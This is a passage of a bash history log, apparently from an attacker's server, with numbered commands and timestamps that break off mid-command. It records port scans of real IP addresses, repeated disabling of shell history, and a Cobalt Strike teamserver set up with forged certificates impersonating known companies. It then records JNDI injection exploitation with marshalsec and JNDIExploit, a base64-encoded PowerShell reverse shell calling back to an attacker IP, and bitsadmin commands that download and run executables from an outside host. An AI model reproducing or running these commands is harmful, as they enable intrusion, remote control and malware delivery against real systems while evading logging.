  1249. nmap -p 1-65535 -T4 -A -v 39.100.227.95
  1250. #1637207300
  1251. nmap -p 1-65535 -T4 -A -v 43.240.74.146
  1252. #1637499424
  1253. ls
  1254. #1637499425
  1255. set +o history;
  1256. #1637499433
  1257. ./teamserver
  1258. #1637499438
  1259. ./teamserver -h
  1260. #1637499479
  1261. ./teamserver 43.129.223.220 50050
  1262. #1637499567
  1263. ./teamserver 43.129.223.220 4433
  1264. #1637499597
  1265. ./teamserver 127.0.0.1 2233262
  1266. #1637499618
  1267. ./teamserver 43.129.223.220 2233262
  1268. #1637505040
  1269. ./teamserver 43.129.223.220 2233262
  1270. #1637509993
  1271. ./teamserver 43.129.223.220 2233262
  1272. #1637505040
  1273. export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
  1274. #1637556599
  1275. set +o history;
  1276. #1637556606
  1277. ./teamserver 43.129.223.220 2233262
  1278. #1637558070
  1279. keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias Microsec.com -dname "CN=Microsec e-Szigno Root CA, OU=e-Szigno CA, O=Microsec Ltd., L=Budapest, S=HU, C=HU"
  1280. #1637558097
  1281. print_info "Generating X509 certificate and keystore (for SSL)"
  1282. #1637558153
  1283. keytool -list -v -keystore cobaltstrike.store
  1284. #1637558187
  1285. keytool -list -v -keystore cobaltstrike.store
  1286. #1637558339
  1287. keytool -list -v -keystore cobaltstrike.store
  1288. #1637559021
  1289. ls
  1290. #1637559022
  1291. set +o history;
  1292. #1637559046
  1293. ./c2lint me.profile
  1294. #1637559058
  1295. chmod +x ./c2lint
  1296. #1637559060
  1297. ./c2lint me.profile
  1298. #1637559158
  1299. vi teamserver
  1300. #1637559906
  1301. keytool -keystore cobaltstrike.store -storepass 2233262 -keypass 2233262 -genkey -keyalg RSA -alias taobao.com -dname "CN=US, OU=”taobao.com“, O=“Sofatest”, L=Beijing, ST=Cyberspace, C=CN"
  1302. #1637559929
  1303. keytool -keystore cobaltstrike.store -storepass Microsoft -keypass 2233262 -genkey -keyalg RSA -alias taobao.com -dname "CN=US, OU=”taobao.com“, O=“Sofatest”, L=Beijing, ST=Cyberspace, C=CN"
  1304. #1637559942
  1305. keytool -list -v -keystore cobaltstrike.store
  1306. #1637560708
  1307. keytool -keystore cobaltstrike.store -storepass Microsoft -keypass 2233262 -genkey -keyalg RSA -alias jquery.com -dname "CN=US, OU=”jquery.com“, O=“jQuery”, L=America, ST=Cyberspace, C=US"
  1308. #1637560716
  1309. keytool -list -v -keystore cobaltstrike.store
  1310. #1637560767
  1311. keytool -keystore cobaltstrike.store -storepass Microsoft -keypass 2233262 -genkey -keyalg RSA -alias jquery.com -dname "CN=US, OU=”jquery.com“, O=“jQuery”, L=America, ST=Cyberspace, C=US"
  1312. #1637560774
  1313. keytool -list -v -keystore cobaltstrike.store
  1314. #1637560782
  1315. keytool -list -v -keystore cobaltstrike.store
  1316. #1637560786
  1317. keytool -list -v -keystore cobaltstrike.store
  1318. #1637561018
  1319. vi teamserver
  1320. #1637561646
  1321. cat teamserver
  1322. #1637561774
  1323. ./teamserver 43.129.223.220 2233262 me.profile
  1324. #1637562143
  1325. ./teamserver 43.129.223.220 2233262 me.profile
  1326. #1637562438
  1327. ./teamserver 43.129.223.220 2233262 me.profile
  1328. #1637562499
  1329. ./teamserver 43.129.223.220 2233262 me.profile
  1330. #1637562613
  1331. ./teamserver 43.129.223.220 2233262 me.profile
  1332. #1637562834
  1333. ./teamserver 43.129.223.220 2233262 ./me.profile
  1334. #1637562944
  1335. ./c2lint me.profile
  1336. #1637563110
  1337. ./c2lint me.profile
  1338. #1637563132
  1339. ./teamserver 43.129.223.220 2233262 ./me.profile
  1340. #1638111222
  1341. set +o history;
  1342. #1638111231
  1343. systemctl restart rpcs
  1344. #1638111236
  1345. systemctl restart rpc
  1346. #1638111242
  1347. ps
  1348. #1638111244
  1349. ls
  1350. #1638111251
  1351. systemctl restart frps
  1352. #1638552085
  1353. set +o history;
  1354. #1638552309
  1355. exit
  1356. #1638572857
  1357. set +o history;
  1358. #1638573114
  1359. w
  1360. #1638573118
  1361. exit
  1362. #1638573383
  1363. set +o history;
  1364. #1639097810
  1365. set +o history;
  1366. #1639097813
  1367. screen
  1368. #1639097819
  1369. yum install screen
  1370. #1639097912
  1371. python python -m SimpleHTTPServer 1092
  1372. #1639097916
  1373. python -m SimpleHTTPServer 8888
  1374. #1639097922
  1375. exit
  1376. #1639097839
  1377. screen
  1378. #1639097926
  1379. ls
  1380. #1639097934
  1381. yum install python
  1382. #1639097946
  1383. python -m SimpleHTTPServer 1092
  1384. #1639097955
  1385. python2 -m SimpleHTTPServer 8888
  1386. #1639097963
  1387. python3 -m SimpleHTTPServer 1092
  1388. #1639097969
  1389. python2 -m SimpleHTTPServer 1092
  1390. #1639097997
  1391. python2 -m SimpleHTTPServer 4040
  1392. #1639098005
  1393. screen -l
  1394. #1639098050
  1395. screen -l
  1396. #1639098055
  1397. screen -ls
  1398. #1639098078
  1399. exit
  1400. #1639098076
  1401. screen -r 1347783
  1402. #1639098080
  1403. screen -ls
  1404. #1639098086
  1405. screen -r 1346257
  1406. #1639098122
  1407. wget https://github.com/RandomRobbieBF/marshalsec-jar/blob/master/marshalsec-0.0.3-SNAPSHOT-all.jar
  1408. #1639098126
  1409. ls
  1410. #1639098148
  1411. chmod +x marshalsec-0.0.3-SNAPSHOT-all.jar
  1412. #1639098176
  1413. thouch Exploit.java
  1414. #1639098185
  1415. touch Exploit.java
  1416. #1639098425
  1417. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1418. #1639098538
  1419. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1420. #1639098649
  1421. javac Exploit.java
  1422. #1639098662
  1423. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1424. #1639098962
  1425. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDRMIfServer http://43.129.223.220:4040/#Exploit 4433
  1426. #1639098974
  1427. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIrefServer http://43.129.223.220:4040/#Exploit 4433
  1428. #1639098985
  1429. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://43.129.223.220:4040/#Exploit 4433
  1430. #1639103450
  1431. javac Exploit.java
  1432. #1639103465
  1433. javac Exploit.java
  1434. #1639103485
  1435. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1436. #1639109656
  1437. javac Exploit.java
  1438. #1639109684
  1439. javac Exploit.java
  1440. #1639109694
  1441. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1442. #1639110868
  1443. javac Exploit.java
  1444. #1639110877
  1445. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1446. #1639111179
  1447. javac Exploit.java
  1448. #1639111186
  1449. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1450. #1639112021
  1451. javac Exploit.java
  1452. #1639112050
  1453. javac Exploit.java
  1454. #1639112424
  1455. javac Exploit.java
  1456. #1639112433
  1457. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1458. #1639113239
  1459. javac Exploit.java
  1460. #1639113250
  1461. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1462. #1639113978
  1463. javac Exploit.java
  1464. #1639114005
  1465. javac Exploit.java
  1466. #1639114026
  1467. javac Exploit.java
  1468. #1639114917
  1469. ps
  1470. #1639114922
  1471. javac Exploit.java
  1472. #1639114929
  1473. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1474. #1639114938
  1475. screen -ls
  1476. #1639114975
  1477. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1478. #1639114034
  1479. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1480. #1639115006
  1481. ps
  1482. #1639115008
  1483. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1484. #1639115039
  1485. javac Exploit.java
  1486. #1639115045
  1487. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1488. #1639115094
  1489. javac Exploit.java
  1490. #1639115100
  1491. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1492. #1639115139
  1493. javac Exploit.java
  1494. #1639115145
  1495. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1496. #1639115778
  1497. javac Exploit.java
  1498. #1639115784
  1499. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1500. #1639115914
  1501. javac Exploit.java
  1502. #1639115921
  1503. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1504. #1639115966
  1505. javac Exploit.java
  1506. #1639115972
  1507. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1508. #1639116138
  1509. javac Exploit.java
  1510. #1639116146
  1511. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1512. #1639118173
  1513. javac Exploit.java
  1514. #1639118180
  1515. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1516. #1639118318
  1517. .javac Exploit.java
  1518. #1639118324
  1519. javac Exploit.java
  1520. #1639118331
  1521. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1522. #1639118744
  1523. javac Exploit.java
  1524. #1639118750
  1525. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1526. #1639118776
  1527. javac Exploit.java
  1528. #1639118782
  1529. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1530. #1639120934
  1531. javac Exploit.java
  1532. #1639120941
  1533. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1534. #1639120980
  1535. javac Exploit.java
  1536. #1639120989
  1537. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1538. #1639121150
  1539. javac Exploit.java
  1540. #1639121174
  1541. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1542. #1639122278
  1543. javac Exploit.java
  1544. #1639122288
  1545. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1546. #1639122356
  1547. javac Exploit.java
  1548. #1639122362
  1549. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1550. #1639122468
  1551. javac Exploit.java
  1552. #1639122476
  1553. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1554. #1639122531
  1555. javac Exploit.java
  1556. #1639122537
  1557. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1558. #1639122594
  1559. wget https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
  1560. #1639122598
  1561. ls
  1562. #1639122611
  1563. chmod +x JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
  1564. #1639122648
  1565. java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "ping cc.37021caf.dns.1433.eu.org"
  1566. #1639123232
  1567. javac Exploit.java
  1568. #1639123239
  1569. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1570. #1639123429
  1571. javac Exploit.java
  1572. #1639123436
  1573. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1574. #1639123870
  1575. javac Exploit.java
  1576. #1639123876
  1577. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1578. #1639127105
  1579. wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip
  1580. #1639127112
  1581. ls
  1582. #1639127126
  1583. unzip JNDIExploit.v1.2.zip
  1584. #1639127130
  1585. ls
  1586. #1639127158
  1587. java -jar JNDIExploit-1.2-SNAPSHOT.jar -h
  1588. #1639127176
  1589. java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 43.129.223.220
  1590. #1639114915
  1591. export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
  1592. #1639143679
  1593. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1594. #1639144241
  1595. javac Exploit.java
  1596. #1639144249
  1597. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1598. #1639143577
  1599. export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
  1600. #1639144352
  1601. javac Exploit.java
  1602. #1639144363
  1603. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1604. #1639144690
  1605. javac Exploit.java
  1606. #1639144696
  1607. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1608. #1639144304
  1609. export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
  1610. #1639144782
  1611. export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
  1612. #1639147668
  1613. javac Exploit.java
  1614. #1639147780
  1615. javac Exploit.java
  1616. #1639148941
  1617. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1618. #1639147787
  1619. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1620. #1639148962
  1621. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1622. #1639149024
  1623. ls
  1624. #1639149114
  1625. java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "ping fff.85eeb633.dns.1433.eu.org"
  1626. #1639149069
  1627. java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "ping fff.85eeb633.dns.1433.eu.org"
  1628. #1639149128
  1629. java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "ping fff.85eeb633.dns.1433.eu.org"
  1630. #1639145026
  1631. export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
  1632. #1639149313
  1633. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://43.129.223.220:4040/#Expl
  1634. #1639149470
  1635. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://43.129.223.220:4040/#Exploit 4433
  1636. #1639149578
  1637. java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 43.129.223.220
  1638. #1639149748
  1639. java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "ping kk.85eeb633.dns.1433.eu.org"
  1640. #1639149814
  1641. java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "ping kk.85eeb633.dns.1433.eu.org" -i 43.129.223.220
  1642. #1639149939
  1643. java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "ping kk.85eeb633.dns.1433.eu.org" -i 43.129.223.220
  1644. #1639149964
  1645. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Expl
  1646. #1639148939
  1647. export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
  1648. #1639149994
  1649. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://43.129.223.220:4040/#Exploit 4433
  1650. #1639150276
  1651. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1652. #1639150338
  1653. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1654. #1639150602
  1655. javac Exploit.java
  1656. #1639150617
  1657. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1658. #1639149107
  1659. export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
  1660. #1639152181
  1661. set +o history;
  1662. #1639152473
  1663. exit
  1664. #1639152471
  1665. export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
  1666. #1639157153
  1667. set +o history;
  1668. #1639157216
  1669. javac Exploit.java
  1670. #1639157224
  1671. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://139.159.140.236:4040/#Exploit 4433
  1672. #1639157315
  1673. javac Exploit.java
  1674. #1639157322
  1675. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://139.159.140.236:4040/#Exploit 4433
  1676. #1639176216
  1677. javac Exploit.java
  1678. #1639176226
  1679. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://139.159.140.236:4040/#Exploit 4433
  1680. #1639176245
  1681. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1682. #1639176332
  1683. javac Exploit.java
  1684. #1639176339
  1685. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1686. #1639176484
  1687. javac Exploit.java
  1688. #1639176491
  1689. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
  1690. #1639176212
  1691. export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
  1692. #1639180723
  1693. exit
  1694. #1639180688
  1695. export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
  1696. #1639180897
  1697. set +o history;
  1698. #1639180897
  1699. reboot
  1700. #1639098011
  1701. python2 -m SimpleHTTPServer 4040
  1702. #1639246390
  1703. set +o history;
  1704. #1639246401
  1705. screen
  1706. #1639249185
  1707. java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "powershell.exe -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANAAzAC4AMQAyADkALgAyADIAMwAuADIAMgAwACIALAA0ADQANQAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==" -A "43.129.223.220"
  1708. #1639249463
  1709. java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "powershell.exe -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANAAzAC4AMQAyADkALgAyADIAMwAuADIAMgAwACIALAA0ADQANQAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiA" -A "43.129.223.220"
  1710. #1639249477
  1711. java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "c:\\windows\\Servers.exe" -A "43.129.223.220"
  1712. #1639249661
  1713. java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bitsadmin /transfer n http://back.ggbggb.com/Server.exe c:\\windows\\Server.exe" -A "43.129.223.220"
  1714. #1639249787
  1715. java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bitsadmin /transfer n http://back.ggbggb.com/Server2.exe c:\\windows\\Server2.exe" -A "43.129.223.220"
  1716. #1639249825
  1717. java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "C:\\windows\\Server2.exe" -A "43.129.223.220"
  1718. #1639249876
  1719. java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "powershell.exe -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANAAzAC4AMQAyADkALgAyADIAMwAuADIAMgAwACIALAA0ADQANQAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==" -A "43.129.223.220"
  1720. #1639250025
  1721. java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C " "C:\\windows\\Server2.exe" -A "43.129.223.220"
  1722. #1639250042
  1723. java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "start C:\\windows\\Server2.exe" -A "43.129.223.220"
  1724. #1639250237
  1725. java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "powershell.exe -e 